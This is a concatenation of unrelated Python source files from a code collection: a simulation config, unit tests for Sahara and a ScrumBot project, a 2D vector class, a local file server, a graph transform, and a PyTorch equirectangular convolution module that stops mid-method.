"SPLAT FITNESS": False,
"INITIALIZATION": False,
"GENERATION": True,
"HOST EXTINCTION": True,
"TE EXTINCTION": True,
"TRIAL NO": True,
"GENE INIT": False,
"TE INIT": False,
};
TE_Insertion_Distribution = Triangle( pmax=0, pzero=3.0/3.0 );
Gene_Insertion_Distribution = Triangle( pzero=1.0/3.0, pmax=1 );
# Triangle( pmax, pzero ) generates values between pmax and pzero with
# a triangular probability distribution, where pmax is the point of highest
# probability, and pzero is the point of lowest probability
# - you can change the orientation of the triangle by reversing the values
# of pmax and pzero
# Flat() generates values between 0 and 1 with uniform probability
Gene_length = 1000; # use 1000?
TE_length = 1000; # use 1000?
TE_death_rate = 0.0005;
TE_excision_rate = 0.1; # set this to zero for retro transposons
# for retro transposons this is the probability of the given number of progeny
# for dna transposons this is the probability of the given number of progeny
# ___PLUS___ the original re-inserting
TE_progeny = ProbabilityTable( 0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3 );
Initial_genes = 5000;
Append_gene = True; # True: when the intialization routine tries to place
# a gene inside another gene, it instead appends it
# at the end of the original gene (use this with small
# amounts of Junk_BP).
# False: when the intialization routine tries to place
# a gene inside another gene, try to place it somewhere
# else again (don't use theis option with samll amounts
# of Junk_BP).
Initial_TEs = 1;
MILLION = 1000000;
Junk_BP = 1.4 * MILLION;
Host_start_fitness = 1.0;
Host_mutation_rate = 0.30;
Host_mutation = ProbabilityTable( 0.40, lambda fit: 0.0,
0.30, lambda fit: fit - random.random()*0.10,
0.15, lambda fit: fit,
0.15, lambda fit: fit + random.random()*0.10
);
# what happens when a TA hits a gene
Insertion_effect = ProbabilityTable(0.30, lambda fit: 0.0,
0.20, lambda fit: fit - random.random()*0.10,
0.30, lambda fit: fit,
0.20, lambda fit: fit + random.random()*0.10
);
Carrying_capacity = 30;
Host_reproduction_rate = 1; # how many offspring each host has
Host_survival_rate = lambda propfit: min( Carrying_capacity * propfit, 0.95 );
# propfit = proportion of fitness owned by this individual
Maximum_generations = 1500;
Terminate_no_TEs = True; # end simulation if there are no TEs left
# seed = 0;
seed = None; # if seed = None, the random number generator's initial state is
# set "randomly"
save_frequency = 50; # Frequency with with which to save state of experiment
saved = None; # if saved = None then we start a new simulation from scratch
# if saves = string, then we open that file and resume a simulation
|
py | b4111c3d64babf65f453f1c3a3853fc05c4d49f0 | from output.models.ms_data.group.group_j004_xsd.group_j004 import (
Doc,
Elem,
)
__all__ = [
"Doc",
"Elem",
]
|
py | b4111c66d3d802f08b48cdff3a0c002afae77ee7 | from collections import Counter
for _ in xrange(int(raw_input())):
alice = Counter(''.join(raw_input().split()))
bob = Counter(''.join(raw_input().split()))
a = Counter(alice-bob)
b = Counter(bob-alice)
if sum(a.values()) != 0 and sum(b.values()) != 0:
print 'You draw some.'
elif sum(a.values()) == 0:
print 'You lose some.'
elif sum(b.values()) == 0:
print 'You win some.'
|
py | b4111d688500c9d3309b999110e5e73f7072feb3 | # Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from sahara.plugins.hdp import confighints_helper as ch_helper
from sahara.tests.unit import base as sahara_base
SAMPLE_CONFIG = {
'configurations': [
{
'tag': 'tag1.xml',
'properties': [
{
'name': 'prop1',
'default_value': '1234',
'description': 'the first property of tag1'
},
{
'name': 'prop2',
'default_value': '5678',
'description': 'the second property of tag1'
}
]
},
{
'tag': 'tag2.xml',
'properties': [
{
'name': 'prop3',
'default_value': '0000',
'description': 'the first property of tag2'
}
]
}
]
}
class ConfigHintsHelperTest(sahara_base.SaharaTestCase):
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_hadoop_json_for_tag',
wraps=ch_helper.load_hadoop_json_for_tag)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_get_possible_hive_config_from(self,
load_json_file,
load_hadoop_json_for_tag):
expected_config = {
'configs': [],
'params': {}
}
actual_config = ch_helper.get_possible_hive_config_from(
'sample-file-name.json')
load_hadoop_json_for_tag.assert_called_once_with(
'sample-file-name.json', 'hive-site.xml')
self.assertEqual(expected_config, actual_config)
@mock.patch(
'sahara.service.edp.oozie.workflow_creator.workflow_factory.'
'get_possible_mapreduce_configs',
return_value=[])
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_hadoop_json_for_tag',
wraps=ch_helper.load_hadoop_json_for_tag)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_get_possible_mapreduce_config_from(self,
load_json_file,
load_hadoop_json_for_tag,
get_poss_mr_configs):
expected_config = {
'configs': []
}
actual_config = ch_helper.get_possible_mapreduce_config_from(
'sample-file-name.json')
load_hadoop_json_for_tag.assert_called_once_with(
'sample-file-name.json', 'mapred-site.xml')
get_poss_mr_configs.assert_called_once_with()
self.assertEqual(expected_config, actual_config)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_hadoop_json_for_tag',
wraps=ch_helper.load_hadoop_json_for_tag)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_get_possible_pig_config_from(self,
load_json_file,
load_hadoop_json_for_tag):
expected_config = {
'configs': [],
'args': [],
'params': {}
}
actual_config = ch_helper.get_possible_pig_config_from(
'sample-file-name.json')
load_hadoop_json_for_tag.assert_called_once_with(
'sample-file-name.json', 'mapred-site.xml')
self.assertEqual(expected_config, actual_config)
def test_get_properties_for_tag(self):
expected_properties = [
{
'name': 'prop1',
'default_value': '1234',
'description': 'the first property of tag1'
},
{
'name': 'prop2',
'default_value': '5678',
'description': 'the second property of tag1'
}
]
actual_properties = ch_helper.get_properties_for_tag(
SAMPLE_CONFIG['configurations'], 'tag1.xml')
self.assertEqual(expected_properties, actual_properties)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_load_hadoop_json_for_tag(self, load_json_file):
expected_configs = [
{
'name': 'prop3',
'value': '0000',
'description': 'the first property of tag2'
}
]
actual_configs = ch_helper.load_hadoop_json_for_tag(
'sample-file-name.json', 'tag2.xml')
self.assertEqual(expected_configs, actual_configs)
|
py | b4111e012df1207bf2917703a396c7af7d954bc1 | ## @file test.py
# @author Arkin Modi, Leon So, Timothy Choy
# @brief Testing for ScrumBot
# @date Apr 5, 2020
import pytest
import task, sprint, meeting, project, dict
import projectList
import datetime
## @brief Functional Requirement Tests for BE1 (Test Plan Section 3.1.1)
class Test_FR_BE1:
# Installation Test Done Manually
pass
## @brief Functional Requirement Tests for BE2 (Test Plan Section 3.1.2)
class Test_FR_BE2:
## @brief Creates a test project and project list for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_projectList = projectList.ProjectList()
## @brief Check if Name and Description is retrieved correctly
def test_create_project_and_getters(self):
assert(
self.test_project.get_name() == "Name" and
self.test_project.get_desc() == "Description"
)
## @brief Check if Name and Description is retrieved correctly for a project with on description
def test_create_project_and_getters_with_no_description(self):
test = project.Project("Name")
assert(
test.get_name() == "Name" and
test.get_desc() == "No description"
)
## @brief Add project to the project list
def test_add_project_to_list(self):
self.test_projectList.add(self.test_project)
assert(self.test_projectList.to_seq()[0][1] == self.test_project)
## @brief Functional Requirement Tests for BE3 (Test Plan Section 3.1.3)
class Test_FR_BE3:
## @brief Creates a test project and project list for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_projectList = projectList.ProjectList()
self.test_projectList.add(self.test_project)
## @brief Checks is it can remove a project from the project list
def test_remove_project(self):
assert(self.test_projectList.to_seq()[0][1] == self.test_project)
self.test_projectList.remove(0)
assert(self.test_projectList.to_seq() == [])
## @brief Tries to remove a project that is not in the project list
def test_remove_project_not_in_list(self):
with pytest.raises(KeyError):
self.test_projectList.remove(1)
## @brief Functional Requirement Tests for BE4 (Test Plan Section 3.1.4)
class Test_FR_BE4:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @brief Checks if the Task properties are retrieved correctly
def test_add_and_get_task(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_tasks(0)[0][1][0] == "Name" and
self.test_project.get_tasks(0)[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_tasks(0)[0][1][2] == "Details"
)
## @brief Checks if the Task properties are retrieved correctly
def test_add_and_get_task_with_no_details(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00")
assert(
self.test_project.get_tasks(0)[0][1][0] == "Name" and
self.test_project.get_tasks(0)[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_tasks(0)[0][1][2] == "No details"
)
## @brief Tries to get that Tasks of a Sprint that is not in the list of Sprints
def test_get_tasks_of_sprint_not_in_list(self):
with pytest.raises(IndexError):
self.test_project.get_tasks(0)
## @brief Checks if a single Tasks properties are retrieved correctly
def test_get_single_task(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_task(0, 0)[0] == "Name" and
self.test_project.get_task(0, 0)[1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_task(0, 0)[2] == "Details"
)
## @brief Tries to add a Task to a Sprint that does not exist
def test_add_task_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
## @brief Tries to get a single Task of a Sprint that is not in the list of Sprints
def test_get_task_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.get_task(0, 0)
## @brief Checks if Feedback is retrieved correctly
def test_add_and_get_feedback(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
self.test_project.add_feedback(0, "Feedback")
assert(
self.test_project.get_feedback(0, 0) == ["Feedback"]
)
## @brief Tries to add Feedback to a Sprint that is not in the list of Sprints
def test_add_feedback_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.add_feedback(0, "Feedback")
## @brief Tries to add Feedback to Sprint not in the list of Sprints
def test_get_feedback_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.get_feedback(0, "Feedback")
## @brief Functional Requirement Tests for BE5 (Test Plan Section 3.1.5)
class Test_FR_BE5:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @brief Checks if Task is removed
def test_rm_task(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_tasks(0)[0][1][0] == "Name" and
self.test_project.get_tasks(0)[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_tasks(0)[0][1][2] == "Details"
)
self.test_project.rm_task(0)
assert(
self.test_project.get_tasks(0) == []
)
## @brief Tries to remove a Task of a Sprint that is not in the list of Sprints
def test_rm_task_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.rm_task(0)
## @brief Tries to remove a Task that is not in the list of Tasks
def test_rm_task_that_is_not_in_task_list(self):
with pytest.raises(KeyError):
self.test_project.add_sprint()
self.test_project.rm_task(0)
## @brief Checks if the Task's details can be updated
def test_set_task_details(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(self.test_project.get_tasks(0)[0][1][2] == "Details")
self.test_project.set_details(0, "New Details")
assert(self.test_project.get_tasks(0)[0][1][2] == "New Details")
## @brief Tries to update the details of a Task that does not exist
def test_set_task_details_of_empty_list_of_sprints(self):
with pytest.raises(IndexError):
self.test_project.set_details(0, "New Details")
## @brief Functional Requirement Tests for BE6 (Test Plan Section 3.1.6)
class Test_FR_BE6:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @ brief Checks if Feedback is removed
def test_rm_feedback(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
self.test_project.add_feedback(0, "Feedback")
assert(
self.test_project.get_feedback(0, 0) == ["Feedback"]
)
self.test_project.rm_feedback(0, 0)
assert(
self.test_project.get_feedback(0, 0) == []
)
## @brief Tries to remove Feedback from a Sprint that is not in the list of Sprints
def test_rm_feedback_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.rm_feedback(0, 0)
## @brief Functional Requirement Tests for BE7 (Test Plan Section 3.1.7)
class Test_FR_BE7:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @brief Checks if Requirement is retrieved correctly
def test_add_and_get_requirement(self):
self.test_project.add_rqe("Requirement")
assert(
self.test_project.get_rqes() == ["Requirement"]
)
## @brief Checks if Requirement is removed
def test_rm_requirement(self):
self.test_project.add_rqe("Requirement")
assert(self.test_project.get_rqes() == ["Requirement"])
self.test_project.rm_rqe(0)
assert(self.test_project.get_rqes() == [])
## @brief Tries to remove a Requirement that is not in the list of Requirements
def test_rm_requirement_not_in_list(self):
with pytest.raises(IndexError):
self.test_project.rm_rqe(0)
## @brief Functional Requirement Tests for BE8 (Test Plan Section 3.1.8)
class Test_FR_BE8:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
## @breif Checks if a Meeting's properties are retrieved correctly
def test_add_and_get_meeting(self):
assert(
self.test_project.get_meetings()[0][1][0] == "Name" and
self.test_project.get_meetings()[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_meetings()[0][1][2] == "GROOMING"
)
## @brief Checks with Meeting name and description getter are correctly functioning
def test_get_meeting_name_and_description(self):
assert(
self.test_project.get_meeting_name(0) == "Name" and
self.test_project.get_meeting_desc(0) == "Description"
)
## @brief Checks with Meeting name and description getter are correctly functioning
def test_get_meeting_with_no_description(self):
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming")
assert(
self.test_project.get_meeting_desc(1) == "No description"
)
## @brief Tries to get the name of a Meeting that is not in the list of Meetings
def test_get_meeting_name_of_meeting_not_in_list(self):
with pytest.raises(KeyError):
self.test_project.get_meeting_name(2)
## @brief Tries to get the description of a Meeting that is not in the list of Meetings
def test_get_description_of_meeting_not_in_list(self):
with pytest.raises(KeyError):
self.test_project.get_meeting_desc(2)
## @brief Checks if all valid Meeting Types are correctly registered
def test_all_meeting_types(self):
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "standup", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "retrospective", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "sprintplanning", "Description")
assert(
self.test_project.get_meetings()[1][1][2] == "GROOMING" and
self.test_project.get_meetings()[2][1][2] == "STANDUP" and
self.test_project.get_meetings()[3][1][2] == "RETROSPECTIVE" and
self.test_project.get_meetings()[4][1][2] == "SPRINTPLANNING"
)
## @brief Tries to register and invalid Meeting Type
def test_invalid_meeting_type(self):
with pytest.raises(TypeError):
self.test_project.add_meeting("Name", "2020/01/01 00:00", "dance", "Description")
## @brief Functional Requirement Tests for BE9 (Test Plan Section 3.1.9)
class Test_FR_BE9:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
## @brief Checks if Meeting was removed
def test_rm_meeting(self):
assert(
self.test_project.get_meetings()[0][1][0] == "Name" and
self.test_project.get_meetings()[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_meetings()[0][1][2] == "GROOMING"
)
self.test_project.rm_meeting(0)
assert(
self.test_project.get_meetings() == []
)
## @brief Tries to remove a Meeting that is not in the list of Meetings
def test_rm_meeting_with_wrong_key(self):
with pytest.raises(KeyError):
self.test_project.rm_meeting(1)
class Test_FR_BE10:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "standup", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "retrospective", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "sprintplanning", "Description")
## @brief Checks if all Meeting created are correctly retrieved
def test_view_all_meeting(self):
assert(
len(self.test_project.get_meetings()) == 4 and
self.test_project.get_meetings()[0][1][2] == "GROOMING" and
self.test_project.get_meetings()[1][1][2] == "STANDUP" and
self.test_project.get_meetings()[2][1][2] == "RETROSPECTIVE" and
self.test_project.get_meetings()[3][1][2] == "SPRINTPLANNING"
)
class Test_FR_BE11:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_sprint()
## @brief Checks if all Tasks created are correctly retrieved
def test_view_all_tasks(self):
self.test_project.add_task("1", "2020/01/01 00:00", "Details")
self.test_project.add_task("2", "2020/01/01 00:00", "Details")
self.test_project.add_task("3", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_tasks(0)[0][1][0] == "1" and
self.test_project.get_tasks(0)[1][1][0] == "2" and
self.test_project.get_tasks(0)[2][1][0] == "3"
)
|
py | b4111ebf507793baa50967e5613db7ed75e948aa | # -*- coding: utf-8 -*-
"""Top-level package for cuttertest."""
__author__ = """Nhlavutelo Macebele"""
__email__ = '[email protected]'
__version__ = '0.0'
|
py | b4111f5bffa4c21e4749bbda50dad8593b14dc28 | import numpy as np
class Vector2D:
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __eq__(self, vector):
assert isinstance(vector, Vector2D)
return self.x == vector.x and self.y == vector.y
def __neg__(self, vector):
assert isinstance(vector, Vector2D)
return not (self == vector)
def __neg__(self):
return Vector2D(-self.x, -self.y)
def __abs__(self):
return Vector2D(abs(self.x), abs(self.y))
def __add__(self, vector):
assert isinstance(vector, Vector2D)
return Vector2D(self.x + vector.x, self.y + vector.y)
def __radd__(self, vector):
assert isinstance(vector, Vector2D)
return vector + self
def __iadd__(self, vector):
assert isinstance(vector, Vector2D)
self.x += vector.x
self.y += vector.y
return self
def __sub__(self, vector):
assert isinstance(vector, Vector2D)
return Vector2D(self.x - vector.x, self.y - vector.y)
def __rsub__(self, vector):
assert isinstance(vector, Vector2D)
return -vector + self
def __isub__(self, vector):
assert isinstance(vector, Vector2D)
self.x -= vector.x
self.y -= vector.y
return self
def __mul__(self, value):
assert isinstance(value, (int, float))
return Vector2D(self.x * value, self.y * value)
def __rmul__(self, value):
assert isinstance(value, (int, float))
return self * value
def __truediv__(self, value):
assert isinstance(value, (int, float))
assert value != 0
return Vector2D(self.x / value, self.y / value)
def __floordiv__(self, value):
assert isinstance(value, (int, float))
assert value != 0
return Vector2D(self.x // value, self.y // value)
def __pow__(self, value):
assert isinstance(value, (int, float))
return Vector2D(self.x ** value, self.y ** value)
def dot(self, vector):
assert isinstance(vector, Vector2D)
return Vector2D(self.x * vector.x, self.y * vector.y)
def squared_magnitude(self):
return self.x ** 2 + self.y ** 2
def magnitude(self):
return np.sqrt(self.squared_magnitude())
def to_tuple(self):
return (self.x, self.y)
def __str__(self):
return f'({self.x} {self.y})'
|
py | b4111f8bf593ee02bf67fe8105938401f4c5d521 | #!/usr/bin/python
"""This script starts a web server that is listening on port 8000 on localhost.
It will serve local files in the current subdirectory.
An example: If this directory would contain the file "index.html", the file
would be retrievable under this URL:
http://localhost:8000/index.html
"""
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
port = 8000
handler = SimpleHTTPRequestHandler
httpd = HTTPServer(("127.0.0.1", port), handler)
httpd.serve_forever()
|
py | b4111fda8f207297c5fe69083359dcd136607294 |
def test_cli_template():
from snakeobjects import snakeUtils
|
py | b411200d704d9b031035775e933c0723e2793ff4 | """
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
import numpy as np
from mo.graph.graph import create_edge
from mo.middle.pattern_match import apply_pattern
from mo.ops.op import Op, PermuteAttrs
from mo.ops.reshape import Reshape
def mean_to_avgpool_action(graph: nx.MultiDiGraph, matches: dict):
if matches['axis'].value is None or matches['input'].shape is None:
return
dims = len(matches['input'].shape)
ones = np.ones(dims, dtype=np.int64)
mean = graph.node[matches['mean'].node]
mean['stride'] = np.array(ones)
# TODO: need to check axis with real layout
spatial_dims = np.array(matches['axis'].value)
mean['spatial_dims'] = spatial_dims
mean['pad'] = np.zeros((dims, 2), np.int64)
mean['pad_spatial_shape'] = np.array(mean['pad'][spatial_dims])
window = np.array(ones)
window[spatial_dims] = matches['input'].shape[spatial_dims]
mean['window'] = window
mean['TF_op'] = mean['op']
mean['op'] = 'AvgPool'
mean['pool_method'] = 'avg'
mean['rounding_type'] = 'ceil'
mean['exclude_pad'] = 'true'
mean['kernel_spatial'] = window[spatial_dims]
graph.remove_edge(matches['axis'].node, matches['mean'].node)
mean['permute_attrs'] = PermuteAttrs().update_attrs(attrs=[('pad', 'input:0'),
('stride', 'input:0'),
('window', 'input:0'),
('spatial_dims', 'input:0')])
if matches['mean'].keep_dims == False:
output = matches['mean'].out_node()
pool_node = matches['mean']
# Keep dims for AvgPool
shape = np.array(output.shape)
for idx in spatial_dims:
shape = np.insert(shape, idx, 1)
graph.remove_edge(pool_node.id, output.id)
# Create new data for pool with all dims
pool_data = Op.create_data_node(graph, pool_node, {'shape': np.array(shape)})
# Create and connect reshape node
reshape_op = Reshape(graph, {'dim': np.array(output.shape)})
reshape_node = reshape_op.create_node([pool_data], dict(name='Reshape_',
permute_attrs=PermuteAttrs().update_attrs(attrs=[('dim', 'output:0')])))
create_edge(reshape_node, output)
def mean_to_avgpool(graph: nx.MultiDiGraph):
"""
Translate Mean as a average pooling with kernel size equals to reduced dimensions and with no padding.
"""
apply_pattern(
graph,
nodes=[
('input', dict(kind='data')),
('axis', dict(kind='data')),
('mean', dict(kind='op', op='Mean'))],
edges=[
('input', 'mean', {'in': 0}),
('axis', 'mean', {'in': 1})],
action=mean_to_avgpool_action
)
return graph
|
py | b411204c6c3c7c24ac0b31011661143aad01bfeb | import math
import torch
from torch import nn, Tensor
from torch.nn import init
from torch.nn.parameter import Parameter
from torch.nn.modules.utils import _pair
from torch.jit.annotations import Optional, Tuple
from torchvision.ops.deform_conv import deform_conv2d
def equi_conv2d(input, weight, bias=None, stride=(1, 1), padding=(0, 0), dilation=(1, 1)):
# type: (Tensor, Tensor, Tensor, Optional[Tensor], Tuple[int, int], Tuple[int, int], Tuple[int, int]) -> Tensor
"""
Performs Equirectangular Convolution, described in Corners for Layout : End to End Layout Recovery from 360 Images
Arguments:
input (Tensor[batch_size, in_channels, in_height, in_width]): input tensor
weight (Tensor[out_channels, in_channels // groups, kernel_height, kernel_width]):
convolution weights, split into groups of size (in_channels // groups)
bias (Tensor[out_channels]): optional bias of shape (out_channels,). Default: None
stride (int or Tuple[int, int]): distance between convolution centers. Default: 1
padding (int or Tuple[int, int]): height/width of padding of zeroes around
each image. Default: 0
dilation (int or Tuple[int, int]): the spacing between kernel elements. Default: 1
Returns:
output (Tensor[batch_sz, out_channels, out_h, out_w]): result of convolution
Examples::
>>> input = torch.rand(1, 3, 10, 10)
>>> kh, kw = 3, 3
>>> weight = torch.rand(5, 3, kh, kw)
>>> # offset should have the same spatial size as the output
>>> # of the convolution. In this case, for an input of 10, stride of 1
>>> # and kernel size of 3, without padding, the output size is 8
>>> offset = torch.rand(5, 2 * kh * kw, 8, 8)
>>> out = deform_conv2d(input, offset, weight)
>>> print(out.shape)
>>> # returns
>>> torch.Size([1, 5, 8, 8])
"""
weight = weight.to(input.device)
out_channels = weight.shape[0]
if bias is None:
bias = torch.zeros(out_channels, device=input.device, dtype=input.dtype)
else:
bias = bias.to(input.device)
stride_h, stride_w = _pair(stride)
pad_h, pad_w = _pair(padding)
dil_h, dil_w = _pair(dilation)
weights_h, weights_w = weight.shape[-2:]
bs, n_in_channels, in_h, in_w = input.shape
pano_W = int((in_w + 2*pad_w - dil_w*(weights_w-1)-1)//stride_w + 1)
pano_H = int((in_h + 2*pad_h - dil_h*(weights_h-1)-1)//stride_h + 1)
def rotation_matrix(axis, theta):
""" code by cfernandez and jmfacil """
"""
Return the rotation matrix associated with counterclockwise rotation about
the given axis by theta radians.
"""
axis = torch.as_tensor(axis, device='cpu', dtype=input.dtype)
axis = axis / math.sqrt(torch.dot(axis, axis))
a = math.cos(theta / 2.0)
b, c, d = -axis * math.sin(theta / 2.0)
aa, bb, cc, dd = a * a, b * b, c * c, d * d
bc, ad, ac, ab, bd, cd = b * c, a * d, a * c, a * b, b * d, c * d
ROT = torch.tensor([[aa + bb - cc - dd, 2 * (bc + ad), 2 * (bd - ac)],
[2 * (bc - ad), aa + cc - bb - dd, 2 * (cd + ab)],
[2 * (bd + ac), 2 * (cd - ab), aa + dd - bb - cc]], device='cpu', dtype=input.dtype)
return ROT
def equi_coord(pano_W,pano_H,k_W,k_H,u,v):
""" code by cfernandez and jmfacil """
fov_w = k_W * math.radians(360./float(pano_W))
focal = (float(k_W)/2) / math.tan(fov_w/2)
c_x = 0
c_y = 0
u_r, v_r = u, v
u_r, v_r = u_r-float(pano_W)/2.,v_r-float(pano_H)/2.
phi, theta = u_r/(pano_W) * (math.pi) *2, -v_r/(pano_H) * (math.pi)
ROT = rotation_matrix((0,1,0),phi)
ROT = torch.matmul(ROT,rotation_matrix((1,0,0),theta))#np.eye(3)
h_range = torch.tensor(range(k_H), device='cpu', dtype=input.dtype)
w_range = torch.tensor(range(k_W,), device='cpu', dtype=input.dtype)
w_ones = (torch.ones(k_W, device='cpu', dtype=input.dtype))
h_ones = (torch.ones(k_H, device='cpu', dtype=input.dtype))
h_grid = torch.matmul(torch.unsqueeze(h_range,-1),torch.unsqueeze(w_ones,0))+0.5-float(k_H)/2
w_grid = torch.matmul(torch.unsqueeze(h_ones,-1),torch.unsqueeze(w_range,0))+0.5-float(k_W)/2
K = torch.tensor([[focal,0,c_x],[0,focal,c_y],[0.,0.,1.]], device='cpu', dtype=input.dtype)
inv_K = torch.inverse(K)
rays = torch.stack([w_grid,h_grid,torch.ones(h_grid.shape, device='cpu', dtype=input.dtype)],0)
rays = torch.matmul(inv_K,rays.reshape(3,k_H*k_W))
rays /= torch.norm(rays,dim=0,keepdim=True)
rays = torch.matmul(ROT,rays)
rays = rays.reshape(3,k_H,k_W)
phi = torch.atan2(rays[0,...],rays[2,...])
theta = torch.asin(torch.clamp(rays[1,...],-1,1))
x = (pano_W)/(2.*math.pi)*phi +float(pano_W)/2.
y = (pano_H)/(math.pi)*theta +float(pano_H)/2.
roi_y = h_grid+v_r +float(pano_H)/2.
roi_x = w_grid+u_r +float(pano_W)/2.
new_roi_y = (y)
new_roi_x = (x)
offsets_x = (new_roi_x - roi_x)
offsets_y = (new_roi_y - roi_y)
return offsets_x, offsets_y
def distortion_aware_map(pano_W, pano_H, k_W, k_H, s_width = 1, s_height = 1,bs = 16):
""" code by cfernandez and jmfacil """
#n=1
offset = torch.zeros(2*k_H*k_W,pano_H,pano_W, device='cpu', dtype=input.dtype)
for v in range(0, pano_H, s_height):
for u in range(0, pano_W, s_width):
offsets_x, offsets_y = equi_coord(pano_W,pano_H,k_W,k_H,u,v)
offsets = torch.cat((torch.unsqueeze(offsets_y,-1),torch.unsqueeze(offsets_x,-1)),dim=-1)
total_offsets = offsets.flatten()
offset[:,v,u] = total_offsets
offset = torch.unsqueeze(offset, 0)
offset = torch.cat([offset for _ in range(bs)],dim=0)
offset.requires_grad_(False)
#print(offset.shape)
#print(offset)
return offset
offset = distortion_aware_map(pano_W, pano_H, weights_w, weights_h,
s_width = stride_w, s_height = stride_h, bs = bs)
offset = offset.to(input.device)
return deform_conv2d(input, offset, weight, bias=bias, stride=stride, padding=padding, dilation=dilation)
class EquiConv2d(nn.Module):
"""
See equi_conv2d
"""
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, bias=True):
super(EquiConv2d, self).__init__()
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = _pair(kernel_size)
self.stride = _pair(stride)
self.padding = _pair(padding)
self.dilation = _pair(dilation)
self.groups = groups
self.weight = Parameter(torch.empty(out_channels, in_channels // groups,
self.kernel_size[0], self.kernel_size[1]))
if bias:
self.bias = Parameter(torch.empty(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
init.kaiming_uniform_(self.weight, a=math.sqrt(5))
if self.bias is not None:
fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
def forward(self, input):
"""
Arguments:
input (Tensor[batch_size, in_channels, in_height, in_width]): input tensor
"""
